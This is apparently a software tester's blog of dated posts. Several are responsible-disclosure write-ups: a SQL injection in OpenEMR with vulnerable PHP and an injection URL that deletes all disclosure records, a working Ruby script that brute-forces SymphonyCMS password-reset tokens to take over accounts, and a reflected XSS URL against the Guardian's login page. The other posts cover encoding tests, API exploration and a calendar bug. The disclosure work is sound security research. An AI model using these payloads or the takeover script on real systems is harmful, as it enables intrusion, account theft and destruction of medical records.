Thursday, 12 June 2014

SQL Injection security flaw in OpenEMR medical records system.

I recently examined a popular open source medical records system named OpenEMR. A quick review of the app uncovered a SQL Injection vulnerability in the application, that would allow an attacker to execute their own SQL commands against the system. The attack is relatively textbook and its detection and exploitation are outlined below. Firstly, a description of the product:
Profile: OpenEMR is a medical practice management software which also supports Electronic Medical Records (EMR). It is ONC Complete Ambulatory EHR certified and it features fully integrated electronic medical records, practice management for a medical practice, scheduling and electronic billing.

The server side is written in PHP and can be employed in conjunction with a LAMP "stack", though any operating systems with PHP-support are also supported.
...
In the US, it has been estimated that there are more than 5,000 installations of OpenEMR in physician offices and other small healthcare facilities serving more than 30 million patients. Internationally, it has been estimated that OpenEMR is installed in over 15,000 healthcare facilities, translating into more than 45,000 practitioners using the system which are serving greater than 90 million patients.


Source: Wikipedia: http://en.wikipedia.org/wiki/OpenEMR
Affected versions: OpenEMR 4.1.2 Patch 5 (and likely previous patches & releases)
Fix in: OpenEMR 4.1.2 Patch 6 

As usual I reviewed the system as a user, browsing features and recording my actions in my intercepting proxy (BurpSuite). This gave me a good idea of the default system features and usage model. Combined with review through the online documentation, I gained a broad idea of how the system is used and its features or ‘claims’.

The latest/patched code was relatively well protected against SQL Injection, with widespread use of prepared statements, a good defence against 1st order SQL Injection. But, I noticed a few queries were not parameterised. While this is not necessarily a problem, if its possible to include custom inputs into the query, then vulnerabilities can creep in.

In this case, the affected query was a delete for ‘Patient Disclosures’. When the user opts to delete a Disclosure record via the user interface the system runs this query, inserting the record identifier sent via the browser.

Unfortunately, the Open EMR system does not filter out inappropriate characters for these requests, meaning SQL can be written unmodified into the request. As long as the SQL, when combined with the remainder of the query is valid syntactically, the query is then executed. If code had restricted the input to be, for example positive integers, then this vulnerability would be largely mitigated.

You can see the vulnerable code here:

File: openemr-4.1.2/library/log.inc
function deleteDisclosure($deletelid)

{

       $sql="delete from extended_log where id='$deletelid'";

       $ret = sqlInsertClean_audit($sql);

}

As you can see the ID string is just included directly into the string used for the query.

As a proof of concept, I wrote a simple SQL extract that when injected produces a valid but nefarious query. In this case, the query deletes all Patient Disclosures.

The malicious Request URL might look like this (the malicious characters in red):

http://youropenemrserver/openemr/interface/patient_file/summary/disclosure_full.php?deletelid=5%27%20OR%20%271%27=%271

The active code inserted is:
' OR '1'='1

This generates a SQL query like this:
delete from extended_log where id='5' OR '1'='1'

The addition ensures every item in the table is deleted. Not only those with an id of 5. Other injections are of course possible, this one was chosen because its a simple demonstration of SQL Injection. Typically an attacker would try to extract user credentials, or confidential information  - in this case possibly patient medical records.

One positive aspect of the flaw is that it is not pre-auth. So the attack only works when the attacker/exploit code has access to a valid logged-in session. This makes it slightly harder to exploit, but not overly so as an attacker can use methods such as Cross Site Request Forgery to initiate ‘blind’ attacks from another browser tab. But in summary, if OpenEMR is deployed only on a local network this issue is not severe.

Note: I reported this issue in a process of responsible disclosure on a 30 day embargo. (That expired 5 days before a patch was released and 9 days before this post.  

The patch was released on the 8th June 2014 and is meant to address this issue and others. (Look for the fixes from Brady Miller to log.inc). I have not tested this fix.

Monday, 24 March 2014

A security bug in SymphonyCMS ( Predictable Forgotten Password Token Generation )


(This issue is now raised in OSVDB.)

On the 20th October 2013, The SymphonyCMS project released version 2.3.4 of their Content Management System. The release included a security fix for an issue I’d found in their software. The bug made it much easier for people to gain unauthorised access to the SymphonyCMS administration pages. More about that in a moment.

The date of the release is also relevant, its a couple of days shy of 60 days after I had informed the development team of the issue. When I’d informed the team of the bug, I’d mentioned that I’d blog about the issue, sometime on or after the 60 days had elapsed. (That was in line with my Responsible Disclosure policy at the time)

Which product had the bug?


Symphony CMS is a web content management system, built in PHP. It appears to be used by several larger companies & organisations, learn more here


What was the bug?

The forgotten password functionality in v2.3.3 had a weakness, This meant an attacker could bypass the normal login process by pretending to ‘forget’ a users password. It breaks down like this:

Firstly The Attacker needed a username, that was not so difficult as usernames are not secret and can be guessed. E.g.: John Smith, might have a username of  jsmith, john.smith etc.

With the username, The Attacker filled out the forgotten password form and made a note of the date & time when he did it. That bit was easy too, common browser plugins like Firebug tell you the time a server responds to any web page request.


Firebug shows the HTTP response with the server's date & time for the response


Now comes the interesting bit, The Symphony v2.3.3 code uses the date & time to calculate the special “too hard to guess” token it uses in the forgotten password email link.  The PHP code on the server looks like this:

$token = substr(SHA1::hash(time() . rand(0, 1000)), 0, 6);

OK, so that's:

time()         
( precise to the second in php ) Easy: We got that from Firebug

Add that to…

rand(0, 1000)
A random number between zero and 1000.      
Slightly harder, but guessing a thousand numbers is easy for a computer.

Then...

SHA1::hash(...)     
Hashing does not make it harder to guess, I just have a 1000 hashes instead of a 1000 numbers now.

Then...

substr(... , 0, 6)   
The first 6 characters. That's actually making it slightly easier, The first 6 characters may be repeated in the first 6 characters of some of the hashes.

As you might have worked out by now, The Attacker has only to make [less than or equal to] 1000 guesses to access our user’s account, by only knowing their guessable user-name.

Given that by default SymphonyCMS allows users 2 hrs to use the forgotten password link after it has been sent, I have plenty of time to guess them all. This is where some simple ruby automation makes life even easier, in this exploit:

#!/usr/bin/ruby

require 'watir-webdriver'
require 'digest/sha1'
require 'date'

puts "Number of arguments: #{ARGV.length}"

if ARGV.length !=2
    puts "Incorrect arguments!"
    puts "Usage:"
    puts "#{__FILE__} FQDN TIME_STRING"
    exit 2
end

browser = Watir::Browser.new
browser.goto 'about:blank'
puts "Time string: #{ARGV[0]}"

0.upto(1000) do |random_num_guess|
    target_timestamp = DateTime.parse( ARGV[1]).to_time.to_i.to_s

    token=Digest::SHA1.hexdigest(target_timestamp + random_num_guess.to_s )[0,6]

    exploit_url="http://#{ARGV[0]}/symphony/login/#{token}/"
    puts "Try #{random_num_guess} : #{exploit_url}"
    browser.goto exploit_url

    if browser.text.include? 'Retrieve password'
        puts "about:Blanking as the page is a login page."
        browser.goto 'about:blank'
    else
        puts "This URL worked:"
        puts exploit_url
        break   
    end

end # upto
The ruby script above works through all 1000 combinations in a browser window, trying in each one and stopping when it finds one that works, It leaves the browser window open, logged in and ready to use. As you can imagine, its usually finished before the 1000th one is reached. Even on a normal DSL / broadband connection, talking to a slow Amazon EC2 instance in Asia (I’m in th UK) - the whole process only took less than 5 minutes. 

How did I find the vulnerability?


I started checking for the low hanging fruit, simple XSS issues and ways to induce errors in any input forms and headers I could identify as useful. As usual, BurpSuite helped me see the details of the interactions and keep a record of what I had done. I traced the error-behaviour back to the code. That gave me a head start - I knew the relevant parts of the code - that were easily accessible and knew the happy and unhappy code paths.

Amongst these were the login process, and in particular the forgotten password functionality. This especially interested me, as its an essential feature - but one that necessitates the bypassing of the main authentication system. Like a back-gate in the castle wall. Reading through the PHP code, and comparing it to the behaviour - I soon noticed the likely vulnerability. Adding debug, allowed me check my assumptions - and soon I had a working exploit in ruby.


Why SymphonyCMS?


Open source tools are a great place to practice your testing skills, You can examine the system as a black box, and then crack open the code repository and check the code and configuration. You can test your assumptions about how the system works. That's more than you can do with many proprietary software systems.

I’d noticed that the Symphony content management system was used by several media companies, a market sector I have considerable experience in. So it seemed like a good fit. You are also helping to improve the software available to everyone on the internet.


What happened when I reported it?


I forwarded the details, exploit-code and a video of the issue to the development team. We discussed some options, and I pointed them towards a more secure way to create the tokens using the PHP function: openssl_random_pseudo_bytes

The SymphonyCMS team implemented a fix, and released it, as mentioned above. Unfortunately, the fix caused another issue - the forgotten password links no-longer worked at all. (They lengthened the token in the URL but not the one it compared it against in the database).

Sadly, I’ve been too busy to investigate the issue much since, or even write it up (Yes I’m writing about last year!  )


Friday, 12 July 2013

Web application security testing - A Guardian website example.


When you read a blog post like this, or an article on a website, can you be sure its the 'real thing'? How would you know if it had been doctored?

Lets assume the 'server' is fairly secure and hasn't been hacked into. So the content is going to be OK isn't it?, it looks OK..? So we've checked the location bar at the top of our web browser and it definitely has the right website/company name. No funny-looking misspelled names, possibly meaning I'm reading a fake site.

And to be doubly sure, the browsers location bar states its using HTTPS and even has that reassuring little padlock we've come to look for and trust. OK, so to recap:
  • The website's server is secured. (Well - for the the purposes of this, lets give them the benefit of the doubt)
  • The logo, words, content and layout all appear to be kosher.
  • We are using the correct website address. (No unusual spellings e.g.: www.goole.com etc)
  • The page is secured using HTTPS. (Warm glow from the on-screen padlock)
(Don't worry - this actual page is not secured via HTTPS, unlike our hypothetical example above)

An increasing part of my testing is application-security related, investigating websites to answer just these sorts of questions. A few months ago, In my own time, I took a quick look at the Guardian website. I've used the Guardian as an example before, as well as interesting news they have have some cool API tools to learn with. Like many news websites, the Guardian lets users create an account, and log in. This log-in form is essentially the front end to the Guardian's id.guardian.co.uk system, and like all software it has problems - things that can upset its users or owners.

Similar to 'normal' functional testing, you can reverse engineer how a web site or application works by a combination of trying different inputs and  examining exposed parts of the system (JavaScript/HTML/Cookies etc). Security related issues in some respects are easier to find, as you are not constrained by 'typical' system usage. Those oft-ignored 'edge cases' are quite often useful attack vectors. But just like a functional problem, the context in which the bug exists is important - What is the cost to the company to fix/not-fix? What's the risk of not fixing? Are we a target for this sort of threat? Is this a compliance issue? Are we already being hacked in this way?

After examining how the Guardian's log-in page worked (in April), I found that the Guardian's 'id' system was vulnerable to a reflected cross-site scripting (XSS) attack. The web page could be 'polluted' with code or content that wasn't from the Guardian. In this case that was via the URL, I could include my own code and execute it when the user loaded the page in their browser.

The 'reflected' term used above means that its not the Guardian's website that contains the bad/polluting code. But rather their website just reflects the bad-code back to the user - when you request a web page in a certain way. Visiting the Guardian's website directly, by manually typing in the URL, would make us immune to this particular issue. But unfortunately, the Web is errh a web, and we click links all the time - especially on things like Facebook or twitter, where the links are often even obscured or shortened.

The bug could be exploited by amending a normal looking Guardian URL to include some extra/different data:

https://id.guardian.co.uk/signin?returnUrl=%27%0D%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28%27HACKED%27%29;//%0D%3C/SCRIPT%3E

(The issue is fixed now, the above URL does not exploit anymore.)

The web site would then incorporate that into its [returned] JavaScript code unchecked, instead of the normal un-tampered returnURL value:

...
  <script>
        function gPlusSigninCallback(authResult) {
            var fallbackButton = jQuery(".google-plus-fallback-button");
            var jsButton = jQuery(".google-plus-js-button")

            fallbackButton.addClass("hidden")
            jsButton.removeClass("hidden")

            if (authResult['error'] == undefined) {
                if(authResult['g-oauth-window']) {
                    jQuery.ajax({
                        url: 'https://id.guardian.co.uk/jsapi/google/autosignup',
                        cache: false,
                        async: true,
                        crossDomain: true,
                        dataType: 'jsonp',
                        data: {
                            accessToken : authResult.access_token
                        },
                        success : function() {
                            window.open('
'
</script><script>alert('HACKED');//
</script>
', '_parent');
                        }
                    });
                }
            }
        }
   
        <script type="text/javascript">
        (function() {
            var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
            po.src = 'https://apis.google.com/js/client:plusone.js';
            var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
        })();
    </script>

 ...

My XSS code would execute on that page when opened via this modified URL. That modified code can be used to rewrite parts of the page, read a user's cookies or ask the user questions such as What is your password? E.g.:


The issue was particularly bad as it was on the log-in screen, a place where users would be expecting such a question. So despite being self-assured about the authenticity of the web page, thanks to it meeting the criteria mentioned above - A user could have been easily duped.

 

So what did I do?

I reported the issue to a contact at the Guardian and passed on the details of the bug. Following the conventions of Responsible Disclosure, I informed the Guardian of what I had found and that I might blog about the issue, after a given time period had expired. This gives the company time to fix the issue, and security researchers like me credit for our work.

 

What did they do?

They fixed the bug, thereby protecting their users. They also said thanks. That's a lot more than some companies do, so I'm happy.

What can you do?

As a tester, you can start looking for these issues yourself in your systems, there are plenty of resources available to help. For example OWASP have a testing cheat sheet for many application security problems, including reflected XSS. Like other applications of exploratory testing, the real requirements are in your skills and mind-set and this comes in part from experience. 

Your security testing skills may not let you know in advance if a system has been hacked when you come to read it, but at least you will have the skills to find out if it has been - or at least how easy it might be.

Wednesday, 3 October 2012

Simple test automation, with no moving parts.

Can you see the 74?
This is an Ishihara Color Test. Its used to help diagnose colour blindness, people with certain forms of colour blindness would not be able to read the text contained in the image. The full set of 38 plates would allow a doctor to accurately diagnose the colour-perception deficiencies affecting a patient.

The test is ingenious in its concept, yet remarkably simple in its execution. No complicated lenses, lighting, tools or measuring devices are required. The doctor or nurse can quickly administer the test with a simple and portable pack of cards.

The Ishihara test is an end to end test. Anything, from lighting in the room, to the brain of the patient can influence the result. The examiner will endeavour minimise many of the controllable factors, such as switching off the disco lights, asking the patient to remove their blue tinted sun-glasses and maybe checking they can read normal cards (e.g. your patient might be a child.).

End to end tests like this are messy, many factors can be in-play making classic pre-scripted test automation of minimal use as the burden of coding for the myriad of issues can be prohibitive. Furthermore, despite their underlying-complexity, End to End tests, are often the most valuable – they can tell you if your system can do what your customer is paying for. For example, are your data-entry-inputs making it out to the web? Are they readable by your users?


These Ishihara style tests, are a quick way of analysing that end-to-end view. This is an area I have been looking into recently, here's an example of a Unicode-encoding detection file, as rendered by default in Firefox.


The fact that none of the text is legible, tells us that the text is not being rendered in the common Unicode formats (Known as UTF-8, UTF-16LE or UTF16BE ). This type of rendering problem is known as Mojibake. Depending on your context, That might be expected, as by default HTTP uses an older standard text encoding standard 
(labelled ISO 8859-1, which similar to ASCII).

You can actually change how FireFox and Internet Explorer 'decode' the text for a page. These are menus to do it in FireFox on WIndows 7.


If I change FireFox to use the menu option "Unicode (UTF-16)" character encoding, This is what I see:





Notice the page tells me it is being rendered in UTF-16BE. Our special page has reverse engineered what FireFox browser means by UTF-16. There are in fact 2 types of UTF-16,  BE and LE ( If you are interested, you can find out more about this Big Endian / Little Endian quirk ). That's interesting, why did it use UTF-16BE? Is it using UTF-16’s predecessor: UCS-2’s default ordering of Big-Endian? 

(Don’t worry this stuff IS ACTUALLY CONFUSING.)

If I change FireFox to use what is fast becoming the de-facto standard, UTF-8, the page tells us likewise:


I could do other similar investigations, by checking HTTP headers. I might also examine the page-source and the encoding that has configured. But alas, its not uncommon for these to differ for a given page. So to find out which encoding  is actually being used? The Ishihara tests can help.

Unlike other methods very little setup is required, the files just need to be included in the test system or its data. They are safe and simple - They don’t execute any code at run time and are not prone to many of the usual programming relating maintenance issues.

When might you use Ishihara style tests? Whenever you suspect there is some medium that might be interfering with what you are seeing. For example, If you deploy a new cache in front of your website - it shouldn't change how the pages actually are encoded [should it?]. (Changes in encoding might change a page’s appearance - now you have a quick way to check the actual encoding in-use.)

Remember that end-to-end view? Well if our system has multiple steps - which process or affect our text - then any one of those steps might in theory highlight an issue. So even if viewing our test file suggests it is being treated as UTF-8, this might just mean that for example our back-end content management system processed the file as UTF-8. The next step may have again changed the data to a different encoding. So while we can't always be sure what is affecting the Ishihara test text, we can at least see that something in that black box is affecting it in a visible way.

I've only scratched the surface here with the idea of Ishihara tests. They can provide greater resolution in issues such as character/text encoding e.g. Did that euro symbol display OK? Well we know you are not using ASCII text encoding then etc. The technique can be used elsewhere, have a try yourself. You can download the simple example above.

Monday, 10 September 2012

Cincinnati Test Store

Monday 3rd September 1827, A man steps off the road at the corner of Fifth and Elm, and walks into a store. He's frequented the store a few times since it opened, and he's starting to get to know the owner and his range of merchandise. In fact, like many of people in town he's becoming a regular customer.

He steps up to the counter, both he and the store owner glance at the large clock hanging on the wall and nod in unison. The shop-keeper makes a note of the time, the two then begin a rapid discussion of requirements and how the shop keeper might be able to help. When they've agreed what's needed, the shop keeper prepares the various items, bringing them to the counter, weighed, measured and packaged ready for transport to the customers nearby holding.

The store keeper then presents the bill to the customer, who glances at the clock again, and the prices listed on each of the items arranged around the store's shelves and then pays. The customer smiles as he loads the goods onto his horse, happy that he's gotten a good deal and yet been able to talk over his needs with the store keeper - for the items he knew least about. He also appreciated how his purchases were packed securely. As he was travelling back home that day, the extra cost of packing the goods was worth it given the rough ride they'd likely take on the journey.

The store was the Cincinnati Time Store, and the shop keeper was Josiah Warren. The store was novel, in that it charged customers for the base 'cost' of the items on sale plus a cost for the labour-time involved in getting the item to and serving the customer. The store-keeper might also charge a higher rate for work he considered harder. The store was able to undercut other local stores, and increase the amount of business he was able to transact.

Imagine if software testing was bought and sold in this manner. Many successful software testers here in London are contractors, and already work for short contracts as and when is agreeable to both companies. But even then, the time is usually agreed upfront ie: 3 months. Imagine if that time was available on demand, per hour?

What drivers would this put onto our work? and that of other team members?

You might want constant involvement from your testers, in which case the costs are fairly predictable. But remember, you are paying by the hour, you can stop paying for the testing at the end of each hour. Would you keep the tester being paid for the whole day? week? sprint? even if they were not finding any useful information? If you found that pairing your testers with programmers during full-time was not helping, you can save some money from the pure-programming parts of your plan. Conversely your tester would be motivated to show they could pair and be productive - if they wanted to diversify their skills.

As the tester, I'm now financially motivated to keep finding new information. To keep those questions, success stories, bug reports coming. I'm only as good as my last report. If the product owner thinks she's heard enough and wants to ship - then she can stop the costs any-time, and ship.

The team might also want to hire a couple of testers, rather than just one. The testers might then be directly competing for 'renewal' at the end of the hour. I might advertise myself as a fast tester (or rapid tester) and sell my hours at a higher rate. I might do this because I've learned that my customer cares more for timeliness than cost per hour. For example the opportunity cost of not shipping the product 'soon' might be far greater than the cost of the team members. I'd then be motivated to deliver information quicker and more usefully than my cheaper-slower counterpart. My higher rate could help me earn the same income in less time and help the team deliver more sooner.

Has your team been bitten by test automation systems that took weeks or longer to 'arrive'? and maybe then didn't quite do what you needed? or were flaky? If you were being paid by the hour, you would want to deliver the test automation or more usefully the results it provides in a more timely manner. You'd be immediately financially motivated to deliver actual-test-results, information or bug reports, incrementally from your test automation. If you delivered automation that didn't help, didn't help you provide more and better information each hour, how would you justify that premium hourly rate? What's more agile than breaking my test automation development work into a continuous stream of value adding deliverables ? that will constantly be helping us test better and quicker?

Paying for testing by the hour would not necessarily lead to the unfortunate consequences people imagine when competition is used in the workplace. My fellow tester and I could split the work, maximising our ability to do the best testing we can. If my skills were better suited to testing the applications Java & Unix back-end I'd spend my hour there. Mean-while my colleague uses their expertise in GUI testing and usability to locate investigate an array of front end issues.

Unfortunately a tester might also be motivated to drag out testing and drip feed information back to the team. That's a risk. But a second or third tester in the team could help provide a competitive incentive. Especially if those fellow testers were providing better feedback, earlier. Why keep paying Mr SlowNSteady when when Miss BigNewsFirst has found the major issues after a couple of hours work?

I might also be tempted to turn every meeting into a job justification speech. Product Owners would need to monitor whether this was getting out of hand - and becoming more than just sharing information.

I'm not suggesting this as a panacea for all the ills of software development or even testing in particular. What this kind of thinking does is let you examine what the companies that hire testers - want from testers. What are the customers willing to pay for? What are they willing to pay more for? From my experience, in recent contexts, customers want good information about their new software and they want it quickly - so the system can be either fixed and/or released quickly.

Monday, 14 May 2012

Using test automation to help me test, a Google Elevation API example


Someone once asked me if "Testing a login-process was a good thing to 'automate'?". We discussed the actual testing and checking they were concerned with. Their real concern was that their product's 'login' feature was a fundamental requirement, if that was 'broken' they wanted the team to know quick and to get it fixed quicker. A failure to login was probably going to be a show-stopping defect in the product. Another hope was that they could 'liberate' the testers from testing this functionality laboriously in every build/release etc.

At this point the context becomes relevant, the answers can change depending the team, company and application involved. We have an idea of what the team are thinking - we need to think about why they have those ideas. For example, do we host or own the login/authentication service? if not, how much value is their in testing the actual login-process? Would a mock of that service suffice for our automated checks?

What are we looking for in our automated checks? To see it work? for one user? one user at a time? one type of user at a time? I assume we need to check the inverse of these as well, i.e.: Does it not accept a login for an unacceptable user? otherwise we could easily miss one of the most important tests - do we actually allow and disallow user-logins as required/correctly?

These questions soon start highlight the point at which automation can help, and complement testing. That is to say test automation probably wouldn't be a good idea for testing a user-login. But would probably be a good ideas for testing 100 or 1000 logins or types of login. Your testers will probably have to login to use the system themselves, so will inevitably use and eyeball the login process from a a single user perspective. They will unlikely have the time, or patience to test a matrix of 1000 user logins and permissions. Furthermore, the login-service could take advantage of the features automation can bring. For example the login service could be accessed directly and the login API called in what ever manner the tester desires (sequential, parallel, duplicates, fast, slow, random etc). These tests could not practically be performed by one person, and yet are likely to be realistic usage scenarios.

An investigation using reasoning and test automation such as this, that plays to the computers strengths can have the desired knock-on effect of liberating the tester, can even provide them with intelligence [information] to aid finding out more information or bugs. The questioning about what they want, what they need, what are they working-with, all sprang from their desire to find out about a specific application of test automation.

For example, I recently practiced some exploratory test automation on the Google Maps API, in particular the Elevation API. The service, in exchange for a latitude and longitude values returns an elevation in meters. The API is designed for use in conjunction with the other Google Maps APIs, but can be used directly without login, via a simple URL. If we had to test this system, maybe as a potential customer or if I was working with the developers, how might we do that? How might test automation help?

I start by skim-reading the documentation page, just as much as I need to get started. Firstly, as a tester I can immediately bring some issues to light. I can see the page does not provide an obvious indication of what it means by 'elevation'. Is that elevation above sea level? If so does it refer to height above Mean High Water Spring, as is typical for things such as bridges over the sea or river estuaries. Or is it referring to the height above 'chart datum' a somewhat contrived estimate of a mean low tide. I make a note, These questions might well be important to our team - but not instantly answerable.

There's more information on nautical charts.

The documentation also doesn't readily indicate what survey the data is based on (WGS84, OSGB36 etc ) While this won't cause you much concern for plotting the location and elevation of your local pizza delivery guy. It might cause concern if you are using the system for anything business critical. For example the two systems mentioned; WGS84 and OSGB36 can map the same co-ordinates to locations 70 metres apart. Again, context questions are arising. Who'd use this system? If you are hill walking in England or Scotland, the latter is likely to be the system used by your Ordinance Survey maps. But your handheld GPS system is likely to default to the American GPS convention of WGS84. Again, important questions for our team, what will the information be used with? by whom? Will it be meaningful and accurate when used with other data?

Starting to use the API, as with most software is one of the best ways to find out how it does and does not work. I could easily check to see if a single request will deliver a response, with a command like this, e.g:

curl -s 'http://maps.googleapis.com/maps/api/elevation/json?locations=10,1&sensor=false'

I tried a few points, checking the sorts of responses I receive. The responses are JSON by default, indented for readability and the precision of co-ordinates and elevation is to several data decimal points. There again, more questions... Does it need to be human readable? Should we save on bandwidth by leaving out the whitespace? Should the elevation be to 14 decimal point? Here is an example response:

{
   "results" : [
      {
         "elevation" : 39.87668991088867,
         "location" : {
            "lat" : 50.67643799459280,
            "lng" : -1.235103116128651
         },
         "resolution" : 610.8129272460938
      }
   ],
   "status" : "OK"
}

Were the responses typical? To get a bigger sample of data, I decided to request a series of points, across a large area. I chose the Isle of Wight, an area to the south of England that includes areas above & below sea level and is well charted. If I see any strange results I should be able to get a reference map to compare the data against reasonably easily. I also chose to request the points at random rather than request them sequentially. This would allow me to get an overall impression of the elevations with a smaller sample. It would also help to mitigate any bias I might have in choosing latitude or longitude values. I used Ruby's built-in Rand method to generate the numbers. While not truly random, or as random as those found at random.org, they are likely to be considerably more random than those I might choose myself.

I quickly wrote a simple unix shell script to request single elevation points, for a pair of co-ordinates. The points would be chosen at random within the bounds decided (the Isle of man and surrounds). The script would continue requesting continuously, pausing slightly in between each request to avoid overloading the server and being blocked. The results are each directed to a numbered file. A simple script like this can be quickly written in shell, ruby or similar and left to work in our absence. Its simplicity means maintenance and upfront costs are kept to a minimum. No days or weeks of 'test framework' development or reworking. My script was less than a dozen lines long and was written in minutes.

Left to run in the background, while I focused on other work, the script silently did the mundane work we are not good at, but computers excel at. Using the results of these API requests I hoped to chart the results, and maybe spot some anomalies or erroneous data. I thought they might be easier to 'notice' if presented in graphical form.

Several hours later, I examined the results. This is where unix-commands become particularly useful, I can easily 'grep' every file (in a folder now full of several thousand responses) for any lines of text that contain a given string. I looked at the last few responses from the elevation API, and notice that the server has stopped serving results as I have exceeded the query limit. That is, I have requested more elevation values than are allowed under the services terms-of-service. Thats useful information, I can check whether the server started doing this after the right period of time - and how it calculates that. I now have more questions and even some actual real-data I can re-analyse to help.

Often test automation ignores most of the useful information, and is reduced to a simple Pass/Fail check on one or a handful of pre-defined checks. But if you keep all the data, you can re-process the data at any time. I tend to dump it all to individual files, log files or a even a database. Then you can often re-start analysing the system using the recorded data very quickly, and test your ideas against the real system.

In our Google Elevation API example, Using grep, I quickly scanned every file to see all results that were accepted. The command looked like this:

grep "status" * | grep  -v OVER_QUERY_LIMIT

In half a second the command has searched through over 12 thousand results and presented me with the name of the file and the actual lines that include the 'status' response line. A quick scroll through the results and blink test - highlights that their is in fact another type of result. As well as those that exceeded the query limit, those that were ok, there is a third group that return an UNKNOWN_ERROR. Another quick scan of the documentation shows that this is one of the expected response status for the API. I quickly retry the few responses that failed using the same latitude and longitude values - they worked and returned seemingly valid data. This suggests that these failures were intermittent. The failures indicated a useful point; The system can fail, and unpredictably.

More questions... How reliable is the system? Is it reliable enough for my client?

A quick calculation, based on the the number of requests and failures showed that although I had only seen few failures, that was enough to take the availability of the service from 100% down to just under 99.98% reliability. Thats often considered good, but if for example my client was paying for 4 nines (99.99%), They'd want to know. If only to give them a useful negotiation point in contract renewals. I re-ran this test and analysis later and saw a very similar result, it appears as if this might be a useful estimation of the service's availability.

Using the data I had collected, I wrote a short ruby script that read the JSON responses and outputted a single CSV file containing the latitude, longitude and elevation. Ruby is my preference over shell for this type of task, as it has built-in libraries that make the interpretation of data in XML, JSON and YAML form, almost trivial. I then fed these results in to GNUPlot, a simple and free chart plotting tool. GNUPlot allowed me to easily change the colour of plotted points depending on whether the elevation was positive or negative.

Here's the result:



You can see the outline of the Isle, and even what I suspected were a couple of erroneous data points. Closer examination suggests that these are in fact likely to be correct, as they correspond to channels and bays that are open to the sea. Although this exercise had yet to highlight any issues - it performed as useful function nonetheless. It had let me compare my results against another map visually, checking that I was grabbing and plotting the data at least superficially correctly. I had not for example confused latitude with longitude.

I did notice one thing that was not expected in the resulting map. The cloud of points seemed to lack any obvious distortion compared with other maps I found online. It seemed, too good, especially as I had ignored all I had not used any correction for the map projection. I had taken the 3 dimensional lat and long values and 'flat' projected them - and the result still looked ok.

This illustrates how testing is not so much about finding bugs - but rather about finding information, asking questions. We then use that information to help find more information through more testing. I now suspected the data was set to use a projection that worked well at European latitudes e.g. Mercator, or used some other system to make things look 'right' to me. How might this manifest it self elsewhere in the APIs responses? (Google documentation has more info on projections used etc.)

Thinking back to the 3 dimensional nature of the data, I knew that a point on the globe can be represented by multiple sets of co-ordinates [if we use Latitude & Longitude]. A good example is the North Pole. This has a latitude of 90 degrees, but can have any valid longitude.. I try various co-ordinates for the North Pole, and each returned a different elevation. Thats interesting, my client might be planning to using the system for fairly northern latitudes - will the data be accurate enough? If elevation is unreliable around the pole, at what latitude will it be 'good enough'? If our product owners want more information about just how variable the elevation is at the pole is? Or what is the elevation at the south pole? Those are pretty simple modifications to my short script. (Wikipedia has some interesting comments about Google maps near the poles.)

The simple automation used in this example, combined with a human interpretation used relatively little expensive 'human' time and yet maximised the return of automation. Many 'automation solutions' are quite the reverse; requiring extensive development, maintenance and baby sitting. They typically require specialised environments, machine-estates to be created and maintained by [expensive] people. This is far from actually being automated, the man hours required to keep them running, to interpret the results and rerun the ambiguous failures is often substantial.

The exploratory investigation outlined here greatly improves on the coverage a lone human tester can achieve, and yet is lightweight and simple. The scripts are short and easily understood by testers new to the team. They are written in commonly used languages and can be understood quickly by programmers and system administrators alike. My client won't be locked into using "the only guy that can keep those tests running!" and they can free their staff to work on the product - the product that makes money.

Monday, 19 March 2012

A simple test of time.

Last week I was performing another of my 5 minute testing exercises. As posted before, if I get a spare few minutes I pick something and investigate. This time, I'd picked Google Calendar.

One thing people use calendars for is logging what they have done. That is, they function as both schedulers and record keepers. You add what you planned to do, and they also serve as a record of what you did - useful for invoicing clients or just reviewing how you used your time.

Calendars and software based on them are inherently difficult to program and as such are often a rich source of bugs. People make a lot of assumptions about time and dates. For example that something ends after it starts.

That may sound like something that 'just is true', but there are a number of reasons why that might not be the case. Some examples are:
  • You type in the dates the wrong way round (or mix up your ISO and US dates etc)
  • You're working with times around a DST switch, when 30min after 0130h might be 0100h.
  • The system clock decides to correct itself, abruptly, in the middle of an action (A poorly implemented NTP setup could do this)
Google Calendar is widely used, and has been available for sometime, but I suspected bugs could still be uncovered quickly.


I opened Google Calendar, picked a time that day and added an item: Stuff i did. You can see it above in light-blue.


I then clicked on the item, and edited the date. But butter fingers here, typed in the wrong year. Not only that I type only the year in. So now we get to see how Google calendar handles an event ending before it begins.



Google Calendar appears to have deleted the date. OK, maybe its just deleting what [it assumes] is obviously wrong. But why the hour glass? () What was Google's code doing for so long?


A few moments later, after not being able to click on anything else in Google Calendar, I'm greeted with this:



OK, so if I click yes, thats good right? Otherwise won't I be disabling the Calendar code? A few moments later... The window goes blank...




A little later, the page reappears and you get another chance, and the Calendar starts to give you better warnings. But none-the-less that wasn't a good user experience, and certainly a bug.

These are simple to catch bugs, so I'm often left wondering why they are often present in widely used software that probably had considerable money expended in its development. This bug is quite repeatable and present across different browsers and operating systems. All it took was a little investigation.